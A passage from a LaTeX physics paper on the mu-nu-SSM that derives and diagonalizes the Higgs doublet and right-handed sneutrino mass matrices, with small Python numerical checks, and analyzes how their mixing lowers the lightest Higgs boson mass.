\end{array}} \right),
\end{eqnarray}
where
\begin{eqnarray}
&&M_{h_d (\tilde \nu_i^c)^\Re}^2 = \Big[ 2\lambda_i \lambda_j \upsilon_{\nu_j^c} \cot\beta - \Big( (A_\lambda \lambda)_i + 2 \lambda_k \kappa_{ijk} \upsilon_{\nu_j^c} \Big) \Big] \upsilon_u \,, \\
&&M_{h_u (\tilde \nu_i^c)^\Re}^2 = \Big[ 2\lambda_i \lambda_j \upsilon_{\nu_j^c} \tan\beta - \Big((A_\lambda \lambda)_i + 2 \lambda_k \kappa_{ijk}\upsilon_{\nu_j^c} \Big) \Big] \upsilon_d \,,
\end{eqnarray}
and the radiative corrections from the third-generation fermions ${f}={t},{b},{\tau}$ and their superpartners are
\begin{eqnarray}
&&\Delta_{1(2+i)} = \lambda_i \upsilon_u \Delta_{1R} \,, \qquad \Delta_{2(2+i)} = \lambda_i \upsilon_d \Delta_{2R} \, ,\\
&&\Delta_{1R} = \frac{G_F}{2\sqrt{2}\pi^2} \Big\{ \frac{3{m_{t}^4}}{\sin^2\beta} {\mu (A_{t}-\mu\cot\beta)^2\over {\tan\beta (m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}^2}
g(m_{\tilde{t}_1}^2,m_{\tilde{t}_2}^2)
\nonumber\\
&&\hspace{1.3cm}
+ \frac{3{m_{b}^4}}{\cos^2\beta} {(-A_{b}+\mu\tan\beta)\over (m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)} \Big[\log{m_{\tilde{b}_1}^2\over m_{\tilde{b}_2}^2} +{A_{b}(A_{b}-\mu\tan\beta)\over {(m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)}}
g(m_{\tilde{b}_1}^2,m_{\tilde{b}_2}^2)\Big] \nonumber\\
&&\hspace{1.3cm}
+ \frac{{m_{\tau}^4}}{\cos^2\beta}{(-A_{\tau}+\mu\tan\beta)\over (m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)} \Big[ \log{m_{\tilde{\tau}_1}^2\over m_{\tilde{\tau}_2}^2} +{A_{\tau}(A_{\tau}-\mu\tan\beta)\over {(m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)}}
g(m_{\tilde{\tau}_1}^2,m_{\tilde{\tau}_2}^2)\Big] \Big\} \, ,\\
&&\Delta_{2R} = \frac{G_F}{2\sqrt{2}\pi^2} \Big\{ \frac{3{m_{t}^4}}{\sin^2\beta} {(-A_{t}+\mu\cot\beta)\over (m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}\Big[ \log{m_{\tilde{t}_1}^2\over m_{\tilde{t}_2}^2}
+{A_{t}(A_{t}-\mu\cot\beta)\over {(m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}}
g(m_{\tilde{t}_1}^2,m_{\tilde{t}_2}^2)\Big]
\nonumber\\
&&\hspace{1.3cm}+\frac{3{m_{b}^4}}{\cos^2\beta}{\mu (A_{b}-\mu\tan\beta)^2\over {\cot\beta(m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)}^2}g(m_{\tilde{b}_1}^2,m_{\tilde{b}_2}^2) \nonumber\\
&&\hspace{1.3cm}
+ \frac{{m_{\tau}^4}}{\cos^2\beta}{\mu(A_{\tau}-\mu\tan\beta)^2\over {\cot\beta(m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)}^2}
g(m_{\tilde{\tau}_1}^2,m_{\tilde{\tau}_2}^2) \Big\}\, ,
\end{eqnarray}
with $\mu=\lambda_i \upsilon_{\nu_i^c}$ and $g(m_1^2,m_2^2)=2-{m_1^2+m_2^2\over m_1^2-m_2^2}\log{m_1^2\over m_2^2}$. Note that the radiative corrections to the mixing are proportional to the parameters $\lambda_i$.
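As an aside (not part of the original text), the loop function $g$ can be implemented and checked numerically; it is symmetric in its two arguments and vanishes in the degenerate-mass limit $m_1^2\to m_2^2$. The test values below are arbitrary.

```python
import math

def g(m1sq, m2sq):
    """Loop function g(m1^2, m2^2) = 2 - (m1^2 + m2^2)/(m1^2 - m2^2) * log(m1^2/m2^2)."""
    if math.isclose(m1sq, m2sq):
        return 0.0  # degenerate-mass limit
    return 2.0 - (m1sq + m2sq) / (m1sq - m2sq) * math.log(m1sq / m2sq)

# symmetry and near-degenerate behavior (masses squared in GeV^2, arbitrary test values)
a, b = 1.0e6, 4.0e6
print(g(a, b), g(b, a))      # equal by symmetry
print(g(a, a * (1 + 1e-6)))  # tends to zero as the masses become degenerate
```

The near-degenerate value follows the expansion $g\simeq -x^2/6$ with $x=(m_1^2-m_2^2)/m_2^2$.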
Similarly, one can derive the $3\times3$ mass submatrix for the right-handed sneutrinos:
\begin{eqnarray}
M_R^2 = \left( {\begin{array}{*{20}{c}}
M_{(\tilde \nu_i^c)^\Re (\tilde \nu_j^c)^\Re }^2+\Delta_{(2+i)(2+j)} \\
\end{array}} \right)_{3\times3},
\end{eqnarray}
with
\begin{eqnarray}
&&M_{(\tilde \nu_i^c)^\Re (\tilde \nu_j^c)^\Re }^2 = m_{\tilde \nu_{ij}^c}^2 + 2 {(A_\kappa \kappa)}_{ijk} \upsilon_{\nu_k^c} - 2\lambda_k \kappa_{ijk} \upsilon_d \upsilon_u + \lambda_i \lambda_j ( \upsilon_d^2 + \upsilon_u^2) \nonumber\\
&&\hspace{2.5cm} +\:(2\kappa_{ijk}\kappa_{lmk}+4\kappa_{ilk}\kappa_{jmk}) \upsilon_{\nu_l^c}\upsilon_{\nu_m^c} \,,
\end{eqnarray}
and the corrections from the third-generation fermions and their superpartners are
\begin{eqnarray}
&&\Delta_{(2+i)(2+j)} = \lambda_i \lambda_j \Delta_{RR} \,, \\
&&\Delta_{RR} = \frac{G_F}{2\sqrt{2}\pi^2} \Big\{ \frac{3{m_{t}^4}}{\sin^2\beta} {\upsilon_d^2 (A_{t}-\mu\cot\beta)^2\over {(m_{\tilde{t}_1}^2-m_{\tilde{t}_2}^2)}^2}
g(m_{\tilde{t}_1}^2,m_{\tilde{t}_2}^2)
\nonumber\\
&&\hspace{1.45cm}
+\frac{3{m_{b}^4}}{\cos^2\beta}{\upsilon_u^2 (A_{b}-\mu\tan\beta)^2\over {(m_{\tilde{b}_1}^2-m_{\tilde{b}_2}^2)}^2}g(m_{\tilde{b}_1}^2,m_{\tilde{b}_2}^2) \nonumber\\
&&\hspace{1.45cm}
+ \frac{{m_{\tau}^4}}{\cos^2\beta}{\upsilon_u^2 (A_{\tau}-\mu\tan\beta)^2\over {(m_{\tilde{\tau}_1}^2-m_{\tilde{\tau}_2}^2)}^2}
g(m_{\tilde{\tau}_1}^2,m_{\tilde{\tau}_2}^2) \Big\}\, .
\end{eqnarray}
Here, the radiative corrections to the mass submatrix for right-handed sneutrinos are proportional to $\lambda_i\lambda_j$.
\section{Diagonalization of the mass matrix\label{sec3}}
\indent
The mass squared matrix $M_{H}^2$ which contains the radiative corrections can be diagonalized as
\begin{eqnarray}
U_H^T M_{H}^2 U_H = {\rm{diag}} \Big(m_{H_1}^2,m_{H_2}^2\Big),
\end{eqnarray}
by the $2\times2$ unitary matrix $U_H$,
\begin{eqnarray}
U_H=
\left(\begin{array}{*{20}{c}}
-\sin \alpha & \cos \alpha\\
\cos \alpha & \sin \alpha
\end{array}\right).
\end{eqnarray}
Here, the neutral doubletlike Higgs mass squared eigenvalues $m_{{H_{1,2}}}^2$ are given by
\begin{eqnarray}
m_{{H_{1,2}}}^2={1\over 2}\Big[{\rm{Tr}}M_{H}^2 \mp\sqrt{({{\rm{Tr}}M_{H}^2})^2-4{\rm{Det}}M_{H}^2}\Big],
\end{eqnarray}
where ${\rm{Tr}}M_{H}^2={M_{H}^2}_{11}+{M_{H}^2}_{22}$, ${\rm{Det}}{M_{H}^2} = {M_{H}^2}_{11}{M_{H}^2}_{22}-({M_{H}^2}_{12})^2$.
The mixing angle $\alpha$ can be determined by~\cite{Hi-alpha}
\begin{eqnarray}
&&\sin 2\alpha =\frac{2{M_{H}^2}_{12}}{\sqrt{({\rm{Tr}}{M_{H}^2})^2-4{\rm{Det}}{M_{H}^2}}},\nonumber\\
&&\cos 2\alpha =\frac{{M_{H}^2}_{11}-{M_{H}^2}_{22}}{\sqrt{({\rm{Tr}}{M_{H}^2})^2-4{\rm{Det}}{M_{H}^2}}},
\end{eqnarray}
which reduce to $-\sin 2\beta$ and $-\cos 2\beta$, respectively, in the large $m_A$ limit. The convention is that $\pi/4\leq\beta<\pi/2$ for $\tan \beta\geq1$, while $-\pi/2<\alpha<0$. In the large $m_A$ limit, $\alpha=-\pi/2+\beta$.
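As an illustrative numerical cross-check of the eigenvalue and mixing-angle formulas above (a sketch with arbitrary matrix entries, not values from this paper), one can verify that $U_H$ built from $\alpha$ indeed diagonalizes a symmetric $2\times2$ matrix; choosing a negative off-diagonal entry realizes the convention $-\pi/2<\alpha<0$.

```python
import math
import numpy as np

# arbitrary symmetric test matrix (entries in GeV^2) with M12 < 0,
# so that the convention -pi/2 < alpha < 0 is realized
M11, M22, M12 = 4.0e6, 2.5e6, -3.0e5
MH2 = np.array([[M11, M12], [M12, M22]])

tr = M11 + M22
det = M11 * M22 - M12**2
disc = math.sqrt(tr**2 - 4.0 * det)
mH1sq = 0.5 * (tr - disc)  # lighter eigenvalue m_{H_1}^2
mH2sq = 0.5 * (tr + disc)  # heavier eigenvalue m_{H_2}^2

# mixing angle from sin(2 alpha) = 2 M12/disc and cos(2 alpha) = (M11 - M22)/disc
alpha = 0.5 * math.atan2(2.0 * M12 / disc, (M11 - M22) / disc)
UH = np.array([[-math.sin(alpha), math.cos(alpha)],
               [ math.cos(alpha), math.sin(alpha)]])

D = UH.T @ MH2 @ UH            # should equal diag(mH1sq, mH2sq)
ev = np.linalg.eigvalsh(MH2)   # independent numerical eigenvalues (ascending)
```

The identity $U_H^T M_H^2 U_H={\rm diag}(m_{H_1}^2,m_{H_2}^2)$ holds for any $\alpha$ satisfying the two relations for $\sin2\alpha$ and $\cos2\alpha$.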
In the large $m_A$ limit, the light neutral doubletlike Higgs mass squared is approximately given by
\begin{eqnarray}
m_{H_{1}}^2 \simeq m_Z^2 \cos^2 2\beta + \frac{2 \lambda_i \lambda_i s_{_W}^2 c_{_W}^2}{ e^2} m_Z^2 \sin^2 2\beta+\bigtriangleup m_{H_{1}}^2.
\label{mH1-app}
\end{eqnarray}
Compared with the MSSM, the $\mu\nu{\rm SSM}$ acquires an additional term $\frac{2 \lambda_i \lambda_i s_{_W}^2 c_{_W}^2}{ e^2} m_Z^2 \sin^2 2\beta$~\cite{mnSSM1}.
Here, the radiative corrections $\bigtriangleup m_{H_{1}}^2$ can be computed more precisely with public tools, for example, FeynHiggs~\cite{FeynHiggs-1,FeynHiggs-2,FeynHiggs-3,FeynHiggs-4,FeynHiggs-5,FeynHiggs-6,FeynHiggs-7,FeynHiggs-8}, SOFTSUSY~\cite{SOFTSUSY-1,SOFTSUSY-2,SOFTSUSY-3}, SPheno~\cite{SPheno-1,SPheno-2}, and so on. In the numerical section below, we use FeynHiggs-2.13.0 to calculate the radiative corrections to the Higgs boson mass for the MSSM part.
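The large-$m_A$ behavior can be probed with a short numerical sketch (the inputs for $s_W^2$, $c_W^2$, $e^2$, and $\lambda_i$ below are rough illustrative values, not results of this paper): the lighter tree-level eigenvalue of $M_H^2$ should approach the first two terms of Eq.~(\ref{mH1-app}).

```python
import math

mZ, mA = 91.188, 3000.0   # GeV; mA chosen large
tanb = 6.0
beta = math.atan(tanb)
s, c = math.sin(beta), math.cos(beta)

# x = 4 lambda_i lambda_i sW^2 cW^2 / e^2; rough illustrative inputs
lam_sq = 3 * 0.1**2                        # lambda_i lambda_i for lambda_i = 0.1
x = 4.0 * lam_sq * 0.2312 * 0.7688 / 0.0982

# tree-level 2x2 matrix M_H^2
M11 = mA**2 * s**2 + mZ**2 * c**2
M22 = mA**2 * c**2 + mZ**2 * s**2
M12 = -(mA**2 + (1.0 - x) * mZ**2) * s * c

tr = M11 + M22
det = M11 * M22 - M12**2
light = 0.5 * (tr - math.sqrt(tr**2 - 4.0 * det))  # lighter eigenvalue

# large-mA approximation, Eq. (mH1-app) at tree level
approx = mZ**2 * math.cos(2 * beta)**2 + 0.5 * x * mZ**2 * math.sin(2 * beta)**2
```

The residual difference is of relative order $m_Z^2/m_A^2$ and shrinks as $m_A$ grows.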
To deal further with the mass submatrices $M_{R}^2$ and $M_{X}^2$, in the following we choose the usual minimal scenario for the parameter space:
\begin{eqnarray}
&&\lambda _i = \lambda , \quad
({A_\lambda }\lambda )_i = {A_\lambda }\lambda, \quad
\upsilon_{\nu_i^c}=\upsilon_{\nu^c},
\nonumber\\
&&{\kappa _{ijk}} = \kappa {\delta _{ij}}{\delta _{jk}}, \quad
{({A_\kappa }\kappa )_{ijk}} = {A_\kappa }\kappa {\delta _{ij}}{\delta _{jk}}, \quad
m_{\tilde \nu_{ij}^c}^2 = m_{{{\tilde \nu_i}^c}}^2{\delta _{ij}}.
\label{MSPS}
\end{eqnarray}
Then, the $3\times3$ mass submatrix for CP-even right-handed sneutrinos can be simplified as
\begin{eqnarray}
M_R^2 = \left( {\begin{array}{*{20}{c}}
X_{R} & y_{_R} & y_{_R} \\
y_{_R} & X_{R} & y_{_R} \\
y_{_R} & y_{_R} & X_{R} \\
\end{array}} \right),
\end{eqnarray}
with
\begin{eqnarray}
&&X_{R} = (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c} + \lambda^2 \Delta_{RR}\,,\\
&&y_{_R} = \lambda^2 ( \upsilon^2+\Delta_{RR})\,,
\end{eqnarray}
where $\upsilon^2=\upsilon_d^2+\upsilon_u^2$.
Here the radiative corrections retain the dominant contributions, which are proportional to $m_f^4$ ($f=t,b,\tau$).
Through the $3\times3$ unitary matrix $U_R$,
\begin{eqnarray}
U_R=
\left(\begin{array}{*{20}{c}}
\frac{1}{\sqrt{3}} & 0 & -\frac{2}{\sqrt{6}} \\
\frac{1}{\sqrt{3}} & -\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{6}} \\
\frac{1}{\sqrt{3}} & \frac{1}{\sqrt{2}} & \frac{1}{\sqrt{6}}
\end{array}\right),
\end{eqnarray}
the mass squared matrix $M_{R}^2$ can be diagonalized as
\begin{eqnarray}
U_R^T M_{R}^2 U_R = {\rm{diag}} \Big(m_{R_1}^2,m_{R_2}^2,m_{R_3}^2\Big),
\end{eqnarray}
with
\begin{eqnarray}
\label{mR1}
&&m_{R_1}^2=X_{R}+2y_{_R}= (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c} + \lambda^2 (2 \upsilon^2+3\Delta_{RR}),\\
&&m_{R_2}^2=m_{R_3}^2=X_{R}-y_{_R}= (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c} - \lambda^2 \upsilon^2.
\end{eqnarray}
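The statement that $U_R$ diagonalizes $M_R^2$ with eigenvalues $X_R+2y_R$, $X_R-y_R$, $X_R-y_R$ can be verified directly (an illustrative sketch with arbitrary values of $X_R$ and $y_R$, not part of the paper's analysis):

```python
import numpy as np

XR, yR = 2.0e6, 3.0e4  # arbitrary test values (GeV^2)

# M_R^2 has X_R on the diagonal and y_R everywhere off the diagonal
MR = np.full((3, 3), yR) + (XR - yR) * np.eye(3)

s3, s2, s6 = np.sqrt(3.0), np.sqrt(2.0), np.sqrt(6.0)
UR = np.array([[1/s3,     0, -2/s6],
               [1/s3, -1/s2,  1/s6],
               [1/s3,  1/s2,  1/s6]])

D = UR.T @ MR @ UR  # expected: diag(X_R + 2 y_R, X_R - y_R, X_R - y_R)
```

The first column of $U_R$ is the democratic direction $(1,1,1)/\sqrt{3}$, while the other two columns span the degenerate subspace with eigenvalue $X_R-y_R$.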
The radiative corrections are proportional to $\lambda^2$ and are therefore suppressed for $\lambda \sim \mathcal{O}(0.1)$. The masses squared of the CP-even right-handed sneutrinos can then be approximated by
\begin{eqnarray}
m_{S_R}^2 \approx m_{R_1}^2 \approx m_{R_2}^2 = m_{R_3}^2 \approx (A_\kappa+4\kappa\upsilon_{\nu^c})\kappa\upsilon_{\nu^c} +A_\lambda \lambda \upsilon_d \upsilon_u/\upsilon_{\nu^c}\, .
\label{mSR}
\end{eqnarray}
Since $\upsilon_{\nu^c} \gg \upsilon_{u,d}$, the first term gives the main contribution to the mass squared when $\kappa$ is large. Additionally, the masses squared of the CP-odd right-handed sneutrinos $m_{P_R}^2$ can be approximated as
\begin{eqnarray}
m_{P_R}^2 \approx -3A_\kappa\kappa\upsilon_{\nu^c}+(4\kappa+A_\lambda /\upsilon_{\nu^c})\lambda \upsilon_d \upsilon_u\, ,
\label{mPR}
\end{eqnarray}
where the first term is the leading contribution. Therefore, one can use the approximate relation,
\begin{eqnarray}
-4\kappa\upsilon_{\nu^c}\lesssim A_\kappa \lesssim 0\, ,
\label{tachyon}
\end{eqnarray}
to avoid tachyonic states.
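A quick scan (an illustrative sketch; the parameter values are representative choices similar to those used later, not results of the paper) confirms that the approximate masses squared of Eqs.~(\ref{mSR}) and~(\ref{mPR}) are simultaneously positive only when $A_\kappa$ lies roughly in the window of Eq.~(\ref{tachyon}).

```python
import math

# representative values (GeV where dimensionful); illustrative only
kappa, lam, vc, Alam = 0.4, 0.1, 2000.0, 500.0
tanb, v = 6.0, 246.0
vd = v / math.sqrt(1.0 + tanb**2)
vu = tanb * vd

def mSR2(Ak):  # CP-even right-handed sneutrino mass squared, Eq. (mSR)
    return (Ak + 4.0 * kappa * vc) * kappa * vc + Alam * lam * vd * vu / vc

def mPR2(Ak):  # CP-odd right-handed sneutrino mass squared, Eq. (mPR)
    return -3.0 * Ak * kappa * vc + (4.0 * kappa + Alam / vc) * lam * vd * vu

inside = mSR2(-500.0) > 0 and mPR2(-500.0) > 0   # A_kappa inside the window
above  = mPR2(100.0) > 0                          # A_kappa > 0: CP-odd state tachyonic
below  = mSR2(-3500.0) > 0                        # A_kappa < -4 kappa vc: CP-even state tachyonic
```

With these inputs, $-4\kappa\upsilon_{\nu^c}=-3200\;{\rm GeV}$, and only the interior point passes both positivity checks.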
In the minimal scenario for the parameter space presented in Eq.~(\ref{MSPS}), the $2\times3$ mixing mass submatrix $M_{X}^2$ is simplified as
\begin{eqnarray}
M_X^2 = \left( {\begin{array}{*{20}{c}}
M_{X_1}^2 & M_{X_1}^2 & M_{X_1}^2 \\
M_{X_2}^2 & M_{X_2}^2 & M_{X_2}^2 \\
\end{array}} \right),
\end{eqnarray}
where
\begin{eqnarray}
&&M_{X_1}^2 = \lambda \upsilon \sin\beta \Big[ 2\upsilon_{\nu^c} ( 3\lambda \cot\beta - \kappa )- A_\lambda + \Delta_{1R} \Big] \,, \\
&&M_{X_2}^2 = \lambda \upsilon \cos\beta \Big[ 2\upsilon_{\nu^c} ( 3\lambda \tan\beta - \kappa )- A_\lambda + \Delta_{2R} \Big] \,.
\end{eqnarray}
Then, we perform the block diagonalization:
\begin{eqnarray}
\left( {\begin{array}{*{20}{c}}
U_{H}^T & 0 \\
0 & U_{R}^T \\
\end{array}} \right)
\left( {\begin{array}{*{20}{c}}
M_{H}^2 & M_{X}^2 \\
\Big(M_{X}^{2}\Big)^T & M_{R}^2 \\
\end{array}} \right)
\left( {\begin{array}{*{20}{c}}
U_{H} & 0 \\
0 & U_{R} \\
\end{array}} \right)
= {\cal H}
\oplus \left( {\begin{array}{*{20}{c}}
m_{R_2}^2 & 0 \\
0 & m_{R_3}^2 \\
\end{array}} \right),
\end{eqnarray}
with
\begin{eqnarray}
{\cal H}= \left( {\begin{array}{*{20}{c}}
m_{H_1}^2 & 0 & A_{X_1}^2 \\
0 & m_{H_2}^2 & A_{X_2}^2 \\
A_{X_1}^2 & A_{X_2}^2 & m_{R_1}^2 \\
\end{array}} \right),
\end{eqnarray}
where
\begin{eqnarray}
&&A_{X_1}^2 = \sqrt{3} (-M_{X_1}^2 \sin\alpha + M_{X_2}^2 \cos\alpha) \,, \\
&&A_{X_2}^2 = \sqrt{3} (M_{X_1}^2 \cos\alpha + M_{X_2}^2 \sin\alpha) \,.
\end{eqnarray}
In the large $m_A$ limit, $\alpha=-\pi/2+\beta$. Then, one can have the following approximate expressions:
\begin{eqnarray}
\label{AX1}
&&A_{X_1}^2 \simeq \sqrt{3} \lambda \upsilon \sin2\beta \Big[ 2\upsilon_{\nu^c} \Big( \frac{3\lambda}{\sin2\beta} - \kappa \Big)- A_\lambda + \frac{1}{2} (\Delta_{1R} + \Delta_{2R}) \Big] \,, \\
\label{AX2}
&&A_{X_2}^2 \simeq \sqrt{3} \lambda \upsilon \Big[ ( 2\kappa \upsilon_{\nu^c}+ A_\lambda ) \cos2\beta + \Delta_{1R}\sin^2\beta - \Delta_{2R}\cos^2\beta \Big] \,.
\end{eqnarray}
If $A_{X_1}^2=0$, the mixing of Higgs doublets and right-handed sneutrinos will not affect the lightest Higgs boson mass~\cite{mnSSM1}; namely, one can adopt the relation
\begin{eqnarray}
A_\lambda = 2\upsilon_{\nu^c} \Big( \frac{3\lambda}{\sin2\beta} - \kappa \Big) + \frac{1}{2} (\Delta_{1R} + \Delta_{2R}) \,,
\label{Alambda}
\end{eqnarray}
which is analogous to the NMSSM~\cite{ref-NMSSM1,ref-NMSSM2}. More loosely, if $A_\lambda$ is close to the value in Eq.~(\ref{Alambda}), the contribution to the lightest Higgs boson mass from the mixing can also be neglected to a good approximation. In the case $A_{X_1}^2\approx0$, the mass of the lightest Higgs boson is just $m_{H_1}$, given approximately by Eq.~(\ref{mH1-app}).
If $A_{X_1}^2\neq0$, we need to diagonalize the $3\times3$ mass matrix ${\cal H}$ further:
\begin{eqnarray}
U_X^T {\cal H} U_X = {\rm{diag}} \Big(m_h^2,m_H^2,m_{S_3}^2\Big),
\end{eqnarray}
where the eigenvalues $m_h^2,m_H^2,m_{S_3}^2$ and the unitary matrix $U_X$ are given explicitly in Appendix~\ref{app3}. The lightest Higgs boson mass squared is then exactly $m_h^2$. In the large $m_A$ limit, where $m_{H_2}\simeq m_A$, the lightest Higgs boson mass squared is approximately
\begin{eqnarray}
m_h^2 \simeq \frac{1}{2} \Big\{m_{H_1}^2+m_{R_1}^2-\frac{ (A_{X_2}^2)^2}{m_{H_2}^2} -\sqrt{\Big[m_{R_1}^2-m_{H_1}^2-\frac{(A_{X_2}^2)^2}{m_{H_2}^2}\Big]^2 +4(A_{X_1}^2)^2}\Big\}.
\label{mh-app}
\end{eqnarray}
This approximate expression works well, as can easily be checked numerically. When $m_{H_2}$ and $m_{R_1}$ are both large, Eq.~(\ref{mh-app}) can be further approximated by
\begin{eqnarray}
m_h^2 \approx m_{H_1}^2-\frac{(A_{X_1}^2)^2}{m_{R_1}^2} = m_{H_1}^2 \Big[1-\frac{(A_{X_1}^2)^2}{m_{R_1}^2 m_{H_1}^2}\Big].
\label{mh-app1}
\end{eqnarray}
In the numerical analysis, we can define the quantity
\begin{eqnarray}
\xi_h = \frac{(A_{X_1}^2)^2}{m_{R_1}^2 m_{H_1}^2}\,
\label{xih}
\end{eqnarray}
to analyze how the mixing affects the mass of the lightest Higgs boson.
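The accuracy of Eqs.~(\ref{mh-app}) and~(\ref{mh-app1}) can be illustrated with a short numerical sketch (the matrix entries below are illustrative, not taken from the paper's scan), comparing them with the smallest eigenvalue of ${\cal H}$.

```python
import math
import numpy as np

# illustrative entries (GeV^2): large m_A and a heavy right-handed sneutrino
mH1sq, mH2sq, mR1sq = 125.0**2, 2200.0**2, 1500.0**2
AX1sq, AX2sq = 1.0e4, 5.0e3

H = np.array([[mH1sq,   0.0, AX1sq],
              [  0.0, mH2sq, AX2sq],
              [AX1sq, AX2sq, mR1sq]])
exact = np.linalg.eigvalsh(H)[0]  # smallest eigenvalue of the 3x3 matrix

# Eq. (mh-app)
shift = AX2sq**2 / mH2sq
mh2_app = 0.5 * (mH1sq + mR1sq - shift
                 - math.sqrt((mR1sq - mH1sq - shift)**2 + 4.0 * AX1sq**2))

# Eq. (mh-app1) via xi_h of Eq. (xih)
xi = AX1sq**2 / (mR1sq * mH1sq)
mh2_app1 = mH1sq * (1.0 - xi)
```

For these inputs the mixing shift $\xi_h$ is at the few-per-mille level, and both approximations track the exact eigenvalue closely.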
One can diagonalize the $5\times5$ mass submatrix for Higgs doublets and right-handed sneutrinos in the CP-even sector:
\begin{eqnarray}
R_S^T M_{S}^2 R_S = {\rm{diag}} \Big(m_{S_1}^2,m_{S_2}^2,m_{S_3}^2,m_{S_4}^2,m_{S_5}^2\Big),
\end{eqnarray}
with $m_{S_1}=m_h$, $m_{S_2}=m_H$, $m_{S_4}=m_{R_2}$, $m_{S_5}=m_{R_3}$, and the $5\times5$ unitary matrix $R_S$
\begin{eqnarray}
R_S=
\left( {\begin{array}{*{20}{c}}
U_{H} & 0 \\
0 & U_{R} \\
\end{array}} \right)
\left( {\begin{array}{*{20}{c}}
U_X & 0 \\
0 & I_{2\times2} \\
\end{array}} \right),
\end{eqnarray}
where $I_{2\times2}$ denotes the ${2\times2}$ unit matrix.
\section{Numerical analysis\label{sec-num}}
\indent
In this section, we carry out the numerical analysis of the Higgs boson masses. First, we fix the values of the parameters.
For the relevant parameters in the SM, we choose
\begin{eqnarray}
&&\alpha_s(m_{Z})=0.118,\qquad m_{Z}=91.188\;{\rm GeV}, \qquad m_{W}=80.385\;{\rm GeV},
\nonumber\\
&&m_t=173.2\;{\rm GeV},\qquad m_b=4.66\;{\rm GeV}, \qquad\: m_{\tau}=1.777\;{\rm GeV}.
\end{eqnarray}
The other SM parameters can be seen in Ref.~\cite{PDG} from the Particle Data Group.
Here, we choose $A_{\kappa}=-500\;{\rm GeV}$, which easily avoids tachyonic states according to Eq.~(\ref{tachyon}). Considering the direct searches for supersymmetric particles~\cite{PDG}, we reasonably choose $M_2=2M_1=800\;{\rm GeV}$, $M_3=2\;{\rm TeV}$, $m_{{\tilde Q}_3}=m_{{\tilde U}_3}=m_{{\tilde D}_3}=2\;{\rm TeV}$, $m_{{\tilde L}_{3}}=m_{{\tilde E}_{3}}=1\;{\rm TeV}$, $A_{b}=A_{\tau}=1\;{\rm TeV}$, and $A_{t}=2.5\;{\rm TeV}$ for simplicity. As key parameters, $m_{{\tilde Q}_3}$, $m_{{\tilde U}_3}$, $A_t$, and the gaugino mass parameters affect the radiative corrections to the lightest Higgs boson mass. Therefore, one can take proper values for these parameters to keep the lightest Higgs boson mass around $125$ GeV.
In the following, we analyze how the mixing of the Higgs doublets and right-handed sneutrinos affects the lightest Higgs boson mass. From $A_{X_1}^2$ in Eq.~(\ref{AX1}), the parameters that control this mixing contribution are $\lambda,\,\tan\beta,\,\kappa,\,A_\lambda$, and $\upsilon_{\nu^c}$. Here, the parameter $\mu=3\lambda\upsilon_{\nu^c}$ is determined by $\lambda$ and $\upsilon_{\nu^c}$.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig1lam-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig1lam-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ versus $\lambda$: the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. (b) $\xi_h$ versus $\lambda$: the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. Here $\kappa=0.4$, $A_\lambda=500\;{\rm GeV}$, and $\upsilon_{\nu^c}=2\;{\rm TeV}$.}
\label{fig1}
\end{figure}
When $\kappa=0.4$, $A_\lambda=500\;{\rm GeV}$, and $\upsilon_{\nu^c}=2\;{\rm TeV}$, we plot the lightest Higgs boson mass $m_h$ versus the parameter $\lambda$ in Fig.~\ref{fig1}(a), where the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. The mass $m_{H_1}$ would be the lightest Higgs boson mass if the mixing of the Higgs doublets and right-handed sneutrinos were neglected, while $m_h$ is the lightest Higgs boson mass including the mixing. The numerical results indicate that the mixing can affect the lightest Higgs boson mass significantly when the parameter $\lambda$ is large. As $\lambda$ increases, the lightest Higgs boson mass $m_h$ drops quickly and deviates from $m_{H_1}$. For large $\tan\beta$, $m_h$ decreases more quickly with increasing $\lambda$.
To see the reason more clearly, we also plot the quantity $\xi_h$ versus $\lambda$ in Fig.~\ref{fig1}(b), where the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. The quantity $\xi_h$ is defined in Eq.~(\ref{xih}) to quantify the effect of the mixing of the Higgs doublets and right-handed sneutrinos on the lightest Higgs boson mass. The figure shows that $\xi_h$ grows quickly as $\lambda$ increases, and that $\xi_h$ is larger for large $\tan\beta$ than for small $\tan\beta$. When $\lambda$ is small, $\xi_h$ is also small and $m_h$ is close to $m_{H_1}$, because $A_{X_1}^2$ in Eq.~(\ref{AX1}) is proportional to the parameter $\lambda$. Additionally, in this parameter space, $m_H \approx m_A \approx 2.2\;{\rm TeV}$, $m_{S_R}\approx 1.5\;{\rm TeV}$, and $m_{P_R}\approx 1.1\;{\rm TeV}$ for $\tan\beta=6$ and $\lambda=0.1$. Therefore, for $m_A \sim\mathcal{O}({\rm TeV})$ the parameter space can be regarded as being in the large $m_A$ limit, so that the approximate expressions of Eqs.~(\ref{mH1-app}) and~(\ref{mh-app}) work well. Meanwhile $m_{S_R} \sim\mathcal{O}({\rm TeV})$, and the approximate expression of 